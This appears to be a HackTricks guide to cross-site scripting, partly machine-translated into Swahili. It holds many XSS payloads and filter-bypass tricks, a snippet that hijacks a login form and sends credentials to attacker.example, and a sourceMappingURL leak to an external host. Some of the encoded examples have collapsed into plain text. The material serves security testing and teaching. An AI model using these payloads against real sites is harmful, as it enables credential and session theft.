XSS (Cross Site Scripting)

Reading time: 55 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Mbinu

Angalia kama thamani yoyote unayonadhibiti (parameters, path, headers?, cookies?) inarudishwa (reflected) katika HTML au inatumika na JS code.
Tambua muktadha ambako inarudishwa/inatumiwa.
Ikiwa inarudishwa
Angalia ni alama gani unaweza kutumia na kulingana na hilo, andaa payload:
Katika raw HTML:
Je, unaweza kuunda tags mpya za HTML?
Je, unaweza kutumia events au attributes zinazounga mkono javascript: protocol?
Je, unaweza kuepuka ulinzi?
Je, maudhui ya HTML yanatafsiriwa na engine yoyote ya client side JS (AngularJS, VueJS, Mavo...), ambayo unaweza kutumia Client Side Template Injection.
Ikiwa huwezi kuunda HTML tags zinazotekeleza code ya JS, je, unaweza kutumia Dangling Markup - HTML scriptless injection?
Ndani ya HTML tag:
Je, unaweza kutoka katika muktadha wa raw HTML?
Je, unaweza kuunda events/attributes mpya za kukimbisha JS code?
Je, attribute ambamo umefungwa inaunga mkono utekelezaji wa JS?
Je, unaweza kuepuka ulinzi?
Ndani ya JavaScript code:
Je, unaweza kutoroka <script> tag?
Je, unaweza kutoroka string na kuendesha code tofauti ya JS?
Je, input zako ziko katika template literals ``?
Je, unaweza kuepuka ulinzi?
Javascript function inayotekelezwa
Unaweza kuelezea jina la function itakayotekelezwa. mfano: ?callback=alert(1)
Ikiwa inatumika:
Unaweza kujaribu DOM XSS, zingatia jinsi input yako inasawiriwa na kama input iliyodhibitiwa inatumika kwenye sink yoyote.

Unapofanya kazi kwenye XSS tata unaweza kupata kuwa ni muhimu kujua kuhusu:

Debugging Client Side JS

Thamani zilizoonyeshwa

Ili kuinua XSS kwa mafanikio kitu cha kwanza unachotakiwa kupata ni thamani unayonadhibiti ambayo inarejeshwa katika ukurasa wa wavuti.

Intermediately reflected: Ikiwa unagundua kwamba thamani ya parameter au hata path inarejeshwa katika ukurasa wa wavuti unaweza kuendeleza Reflected XSS.
Stored and reflected: Ikiwa unagundua kwamba thamani unayonadhibiti imehifadhiwa kwenye server na inarejeshwa kila wakati unaingia ukurasa unaweza kuendeleza Stored XSS.
Accessed via JS: Ikiwa unagundua kwamba thamani unayonadhibiti inafikiwa kwa kutumia JS unaweza kuendeleza DOM XSS.

Muktadha

Unapojaribu kuiangamiza XSS kitu cha kwanza unachotakiwa kujua ni wapi input yako inarejeshwa. Kulingana na muktadha, utaweza kuendesha JS kwa njia tofauti.

Kama input yako inarudishwa kwenye raw HTML ukurasa utahitaji kutumia baadhi ya HTML tag ili kuendesha JS code: <img , <iframe , <svg , <script ... hizi ni baadhi tu ya tags nyingi unazoweza kutumia.
Pia, kumbuka Client Side Template Injection.

Ndani ya attribute za tag za HTML

Ikiwa input yako inarejeshwa ndani ya value ya attribute ya tag unaweza kujaribu:

Kutoka katika attribute na kutoka ndani ya tag (kisha utakuwa katika raw HTML) na kuunda tag mpya za HTML za kutumiwa: "><img [...]
Ikiwa unaweza kutoka katika attribute lakini si kutoka ndani ya tag (> imekodishwa au imefutwa), kulingana na tag unaweza kuunda event inayotekeleza JS code: " autofocus onfocus=alert(1) x="
Ikiwa hutaweza kutoka katika attribute (" inakodishwa au kufutwa), basi kulingana na attribute gani thamani yako inarejeshwa na kama unadhibiti thamani yote au sehemu tu utaweza kuitumia. Kwa mfano, kama unadhibiti event kama onclick= utaweza kuiifanya iendeshe code chochote inapobonyezwa. Mfano mwingine wa kuvutia ni attribute href, ambapo unaweza kutumia protocol ya javascript: kuendesha code: href="javascript:alert(1)"
Ikiwa input yako inarejeshwa ndani ya "unexpoitable tags" unaweza kujaribu mbinu ya accesskey kuchukua faida ya udhaifu (utahitaji aina ya social engineering kutekeleza): " accesskey="x" onclick="alert(1)" x="

Mfano wa ajabu wa Angular ukifanya XSS ikiwa unadhibiti jina la class:

html

<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>

Ndani ya msimbo wa JavaScript

Katika kesi hii ingizo lako linaonyeshwa kati ya <script> [...] </script> tags za ukurasa wa HTML, ndani ya faili .js au ndani ya sifa inayotumia protocol javascript::

Ikiwa imeonyeshwa kati ya <script> [...] </script> tags, hata kama ingizo lako liko ndani ya aina yoyote ya nukuu, unaweza kujaribu kuingiza </script> na kutoroka katika muktadha huu. Hii inafanya kazi kwa sababu kivinjari kitasoma kwanza lebo za HTML kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya </script> uliyoingiza iko ndani ya msimbo wa HTML.
Ikiwa imeonyeshwa ndani ya JS string na mbinu ya mwisho haitumiki utahitaji kutoka kwenye string, kutekeleza msimbo wako na kujenga upya msimbo wa JS (kama kuna kosa, hautatekelezwa:
'-alert(1)-'
';-alert(1)//
\';alert(1)//
Ikiwa imeonyeshwa ndani ya template literals unaweza kuingiza expressions za JS ukitumia syntaxi ${ ... }: var greetings = Hello, ${alert(1)}``
Kutumia encoding ya Unicode hufanya iwezekane kuandika valid javascript code:

javascript

alert(1)
alert(1)
alert(1)

Javascript Hoisting

Javascript Hoisting inarejelea fursa ya kutangaza functions, variables au classes baada ya zimetumika ili uweze kutumia mazingira ambapo XSS inatumia undeclared variables au functions.
Tazama ukurasa ufuatao kwa maelezo zaidi:

JS Hoisting

Javascript Function

Kurasa kadhaa za wavuti zina endpoints ambazo zinakubali kama parameter jina la function la kutekeleza. Mfano wa kawaida wa kuona ni kitu kama: ?callback=callbackFunc.

Njia nzuri ya kugundua kama kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni kwa kubadilisha thamani ya param (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama:

Ikiwa ni vulnerable, unaweza kuwa na uwezo wa kusababisha alert kwa kutuma tu thamani: ?callback=alert(1). Hata hivyo, mara nyingi endpoint hizi zitakuwa zikithibitisha yaliyomo ili kuruhusu tu herufi, nambari, titikio na underscores ([\w\._]).

Hata hivyo, hata kwa kikomo hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars halali hizo kufikia element yoyote kwenye DOM:

Baadhi ya functions zenye manufaa kwa hili:

firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement

Unaweza pia kujaribu kusababisha Javascript functions moja kwa moja: obj.sales.delOrders.

Hata hivyo, kawaida endpoints zinazotekeleza function iliyoashiriwa ni endpoints zisizo na DOM yenye mvuto mwingi, kurasa nyingine katika same origin zitakuwa na DOM yenye mvuto zaidi za kufanya vitendo vingi.

Hivyo, ili kuutumia udhaifu huu kwenye DOM tofauti exploit ya Same Origin Method Execution (SOME) ilitengenezwa:

SOME - Same Origin Method Execution

DOM

Kuna JS code inayotumia kwa njia isiyo salama baadhi ya data inayodhibitiwa na mshambulizi kama location.href. Mshambulizi anaweza kutumia hili kuendesha arbitrary JS code.

DOM XSS

Universal XSS

Aina hizi za XSS zinaweza kupatikana mahali popote. Hazitegemei tu udhaifu wa client wa web application bali zinategemea muktadha wowote. Aina hizi za arbitrary JavaScript execution zinaweza hata kutumiwa kupata RCE, kusoma faili zozote kwenye clients na servers, na mengine mengi.
Baadhi ya mfano:

Server Side XSS (Dynamic PDF)

Electron Desktop Apps

WAF bypass encoding image

from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21

Injecting inside raw HTML

When your input is reflected inside the HTML page or you can escape and inject HTML code in this context the first thing you need to do if check if you can abuse < to create new tags: Just try to reflect that char and check if it's being HTML encoded or deleted of if it is reflected without changes. Only in the last case you will be able to exploit this case.
For this cases also keep in mind Client Side Template Injection.
Kumbuka: A HTML comment can be closed using****-->****or **--!>****

Katika kesi hii na ikiwa hakuna black/whitelisting inatumiwa, unaweza kutumia payloads kama:

html

<script>
alert(1)
</script>
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>

Lakini, ikiwa black/whitelisting ya tags/attributes inatumiwa, utahitaji brute-force which tags unaweza kuunda.
Mara utakapo gundua ni tags zipi zinazoruhusiwa, itabidi brute-force attributes/events ndani ya tags halali ulizopata ili kuona jinsi unavyoweza kushambulia muktadha.

Tags/Events brute-force

Nenda kwenye https://portswigger.net/web-security/cross-site-scripting/cheat-sheet na bonyeza Copy tags to clipboard. Kisha, tuma zote kwa kutumia Burp intruder na angalia kama kuna tag ambayo WAF haikutambua kama hatari. Mara utakapo gundua tags unazoweza kutumia, unaweza brute force all the events kwa kutumia tags halali (katika ukurasa huo huo bonyeza Copy events to clipboard na fuata taratibu ule ule kama hapo awali).

Tags maalum

Ikiwa hukupata tag yoyote ya HTML halali, unaweza kujaribu kuunda tag maalum na kutekeleza JS code kwa kutumia attribute onfocus. Katika ombi la XSS, unahitaji kumalizia URL kwa # ili kufanya ukurasa ielekeze kwenye kitu hicho na kutekeleza msimbo:

/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x

Blacklist Bypasses

Ikiwa aina fulani ya blacklist inatumiwa unaweza kujaribu ku-bypass kwa mbinu za kuchekesha:

javascript

//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //

Length bypass (small XSSs)

[!NOTE] > Tiny XSS payloads kwa mazingira mbalimbali zinaweza kupatikana hapa na hapa.

html

<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>

Ya mwisho inatumia tabia 2 za unicode ambazo zinaongezeka hadi 5: telsr
Zaidi ya tabia hizi zinaweza kupatikana hapa.
Ili kukagua ni katika tabia zipi zinavunjwa angalia hapa.

Click XSS - Clickjacking

Ikiwa ili kufaidisha na vunjo hilo unahitaji mtumiaji kubofya kiungo au fomu yenye data iliyojazwa awali unaweza kujaribu abuse Clickjacking (ikiwa ukurasa una udhaifu).

Impossible - Dangling Markup

Ikiwa unadhani tu kwamba haiwezekani kuunda tag ya HTML yenye attribute itakayotekeleza JS code, unapaswa kuangalia Danglig Markup kwa sababu unaweza exploit vunjo hilo bila kutekeleza JS code.

Injecting inside HTML tag

Inside the tag/escaping from attribute value

Ikiwa uko ndani ya tag ya HTML, jambo la kwanza unaweza kujaribu ni kutoroka kutoka tag na kutumia baadhi ya techniques zilizotajwa katika sehemu iliyopita ili kutekeleza JS code.
Ikiwa hutaweza kutoka kwenye tag, unaweza kuunda attributes mpya ndani ya tag kujaribu kutekeleza JS code, kwa mfano kwa kutumia payload kama (kumbuka kwamba katika mfano huu double quotes zimetumika kukimbia kutoka kwenye attribute, hutazihitaji ikiwa input yako inarudishwa moja kwa moja ndani ya tag):

bash

" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t

Matukio ya mtindo

python

<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>

Ndani ya attribute

Hata kama huwezi kutoroka kutoka kwenye attribute (" inafichwa au kufutwa), kulingana na attribute gani thamani yako inaonyeshwa ndani yake — na ikiwa unadhibiti thamani yote au sehemu tu — utaweza kuitumia mbaya. Kwa mfano, ikiwa unadhibiti event kama onclick= utaweza kuifanya itekeleze code yoyote inapobonolewa.
Mfano mwingine wa kuvutia ni attribute href, ambapo unaweza kutumia protocol ya javascript: kutekeleza code yoyote: href="javascript:alert(1)"

Bypass ndani ya event ukitumia HTML encoding/URL encode

Herufi za HTML encoded characters ndani ya thamani za attributes za tags za HTML zinatafsiriwa wakati wa runtime. Kwa hivyo kitu kama kifuatacho kitakuwa halali (the payload is in bold): <a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Go Back </a>

Kumbuka kwamba aina yoyote ya HTML encode ni halali:

javascript

//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27-alert(1)-&#x27
//HTML hex with zeros
&#x00027-alert(1)-&#x00027
//HTML dec without zeros
&#39-alert(1)-&#39
//HTML dec with zeros
&#00039-alert(1)-&#00039

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>

Kumbuka kwamba URL encode pia itafanya kazi:

python

<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>

Bypass ndani ya event kwa kutumia Unicode encode

javascript

//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />

Itifaki Maalum ndani ya attribute

Huko unaweza kutumia itifaki javascript: au data: katika maeneo fulani ili kutekeleza msimbo wa JS wa hiari. Baadhi zitahitaji mwingiliano wa mtumiaji; zingine hazitahitaji.

javascript

javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
javascript:alert(1)
java        //Note the new line
script:alert(1)

data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==

Maeneo unayoweza kuingiza protokoli hizi

Kwa ujumla protokoli ya javascript: inaweza kutumika katika tag yoyote inayokubali sifa href na katika sehemu nyingi za tag zinazokubali sifa ya src (lakini si <img)

html

<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>

//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">

Mbinu nyingine za obfuscation

Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu iliyopita pia ni halali kwani uko ndani ya attribute.

javascript

<a href="javascript:var a='&apos;-alert(1)-&apos;'">

Zaidi ya hayo, kuna njia nzuri nyingine kwa kesi hizi: Hata kama input yako ndani ya javascript:... inakuwa URL encoded, ita URL decoded kabla ya kutekelezwa. Kwa hivyo, ikiwa unahitaji escape kutoka kwenye string ukitumia single quote na unaona kwamba inakuwa URL encoded, kumbuka kwamba haina maana, itaitafsiriwa kama single quote wakati wa execution.

javascript

&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>

Kumbuka kwamba ukijaribu tumia zote mbili URLencode + HTMLencode kwa mpangilio wowote ku-encode payload haita fanya kazi, lakini unaweza changanya ndani ya payload.

Kutumia Hex and Octal encode with javascript:

Unaweza kutumia Hex na Octal encode ndani ya sifa ya src ya iframe (angalau) ili kutaja HTML tags to execute JS:

javascript

//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />

//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />

Reverse tab nabbing

javascript

<a target="_blank" rel="opener"

Ikiwa unaweza kuingiza URL yoyote katika tag yoyote ya <a href= ambayo ina sifa target="_blank" and rel="opener", angalia ukurasa ufuatao ili kufaida tabia hii:

Reverse Tab Nabbing

Bypass ya 'on' Event Handlers

Kwanza angalia ukurasa huu (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) kwa "on" event handlers muhimu.
Ikiwa kuna blacklist inayokuzuia kuunda hizi even handlers unaweza kujaribu bypasses zifuatazo:

javascript

<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>

//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B

XSS katika "Unexploitable tags" (hidden input, link, canonical, meta)

Kutoka here sasa inawezekana kutumia vibaya hidden inputs kwa:

html

<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />

Na katika meta tags:

html

<!-- Injection inside meta attribute-->
<meta
name="apple-mobile-web-app-title"
content=""
Twitter
popover
id="newsletter"
onbeforetoggle="alert(2)" />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>

Kutoka here: Unaweza kutekeleza XSS payload inside a hidden attribute, mradi ukaweza kumshawishi mwanaathiriwa kubonyeza mchanganyiko wa vitufe. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa vitufe ni ALT+SHIFT+X na kwenye OS X ni CTRL+ALT+X. Unaweza kubainisha mchanganyiko tofauti wa vitufe kwa kutumia kitufe tofauti katika access key attribute. Hapa ni vector:

html

<input type="hidden" accesskey="X" onclick="alert(1)">

Payload ya XSS itakuwa kama hii: " accesskey="x" onclick="alert(1)" x="

Blacklist Bypasses

Mbinu kadhaa za kutumia encoding tofauti zimetajwa tayari ndani ya sehemu hii. Rudi ili kujifunza wapi unaweza kutumia:

HTML encoding (HTML tags)
Unicode encoding (inaweza kuwa valid JS code): \u0061lert(1)
URL encoding
Hex and Octal encoding
data encoding

Bypasses for HTML tags and attributes

Soma Blacklist Bypasses of the previous section.

Bypasses for JavaScript code

Soma the JavaScript bypass blacklist of the following section.

CSS-Gadgets

Ikiwa umepata XSS katika sehemu ndogo sana ya tovuti inayohitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu kubadilisha nafasi ambayo kipengele hicho kinachukua ili kuongeza uwezekano wa link kutekelezwa.

Kwa mfano, unaweza kuongeza styling katika kipengele kama: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5

Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa unapopata, kwa mfano

.test {display:block; color: blue; width: 100%}

#someid {top: 0; font-family: Tahoma;}

Sasa unaweza kubadilisha link yetu na kuibadilisha kuwa fomu

<a href="" id=someid class=test onclick=alert() a="">

Njia hii ilichukuliwa kutoka kwa https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703

Injecting inside JavaScript code

Katika kesi hizi input yako itaonyeshwa ndani ya JS code ya faili .js au kati ya <script>...</script> tags au kati ya HTML events zinazoweza kutekeleza JS code au kati ya attributes zinazokubali protocol ya javascript:.

Kuondoka kutoka kwenye tag ya <script>

Ikiwa code yako imeingizwa ndani ya <script> [...] var input = 'reflected data' [...] </script> unaweza kwa urahisi kuepuka kufunga tag ya <script>:

javascript

</script><img src=1 onerror=alert(document.domain)>

Kumbuka kwamba katika mfano huu hatujafunga hata nukuu moja. Hii ni kwa sababu HTML parsing is performed first by the browser, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwa ni pamoja na blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizopachikwa hufanywa tu baadaye.

Ndani ya msimbo wa JS

Ikiwa <> zinasafishwa bado unaweza escape the string mahali ambapo ingizo lako limewekwa (located) na execute arbitrary JS. Ni muhimu fix JS syntax, kwa sababu ikiwa kuna makosa, msimbo wa JS hautatekelezwa:

'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//

JS-in-JS string break → inject → repair pattern

Wakati ingizo la mtumiaji linapoingia ndani ya quoted JavaScript string (kwa mfano, server-side echo katika inline script), unaweza kumaliza string, inject code, na kurekebisha syntax ili parsing ibaki halali. Generic skeleton:

"            // end original string
;            // safely terminate the statement
<INJECTION>  // attacker-controlled JS
; a = "      // repair and resume expected string/statement

Mfano wa muundo wa URL wakati parameter dhaifu imerejeshwa ndani ya JS string:

?param=test";<INJECTION>;a="

Hii inatekeleza attacker JS bila kuhitaji kugusa HTML context (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu.

Template literals ``

Ili kuunda strings, mbali na single na double quotes, JS pia inakubali backticks `` . Hii inajulikana kama template literals kwani zinaruhusu embedded JS expressions kwa kutumia sintaksia ${ ... }.\
Kwa hivyo, ukigundua kuwa input yako ina reflected ndani ya JS string inayotumia backticks, unaweza kutumia sintaksia ${ ... } kutekeleza arbitrary JS code:

Hii inaweza kutumiwa vibaya kwa kutumia:

javascript

;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`

javascript

// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop() {
return loop
}
loop``

Utekelezaji wa code uliosimbwa

html

<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>alert(1)</script></svg>  <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">

Payloads zinazotolewa na eval(atob()) na tofauti za scope

Ili kuweka URLs fupi na kupita vichujio rahisi vya maneno muhimu, unaweza ku-encode logic yako halisi kwa base64 na kui-evaluate kwa eval(atob('...')). Ikiwa vichujio rahisi vya maneno muhimu vinazuia identifiers kama alert, eval, au atob, tumia Unicode-escaped identifiers ambazo zina-compile kwa njia ile ile kwenye browser lakini zinaepuka vichujio vinavyolingana na string:

\u0061\u006C\u0065\u0072\u0074(1)                      // alert(1)
\u0065\u0076\u0061\u006C(\u0061\u0074\u006F\u0062('BASE64'))  // eval(atob('...'))

Tofauti muhimu kuhusu scoping: const/let zinazotangazwa ndani ya eval() ni block-scoped na HAZIUNZI globals; hazitapatikana kwa scripts zinazofuatia. Tumia <script> element iliyochomwa dinamiki ili kufafanua global, non-rebindable hooks inapohitajika (kwa mfano, ku-hijack form handler):

javascript

var s = document.createElement('script');
s.textContent = "const DoLogin = () => {const pwd = Trim(FormInput.InputPassword.value); const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));}";
document.head.appendChild(s);

Marejeo: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

Utekelezaji wa JS kupitia kodishaji la Unicode

javascript

alert(1)
alert(1)
alert(1)

Mbinu za JavaScript bypass blacklists

Strings

javascript

"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))

Escapes maalum

javascript

"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
// Any other char escaped is just itself

Mbadala za nafasi ndani ya msimbo wa JS

javascript

<TAB>
/**/

JavaScript comments (kutoka JavaScript Comments triki)

javascript

//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line

JavaScript new lines (kutoka JavaScript new line triki)

javascript

//Javascript interpret as new line these chars:
String.fromCharCode(10)
alert("//\nalert(1)") //0x0a
String.fromCharCode(13)
alert("//\ralert(1)") //0x0d
String.fromCharCode(8232)
alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9

JavaScript nafasi nyeupe

javascript

log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279

//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>

Javascript ndani ya comment

javascript

//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send

//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com

JavaScript bila mabano

javascript

// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name

// Backtips
// Backtips pass the string as an array of lenght 1
alert`1`

// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`

// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`

//It's possible to construct a function and call it
Function`x${'alert(1337)'}x`

// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead

// Using Reflect.apply to call any function with any argumnets
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
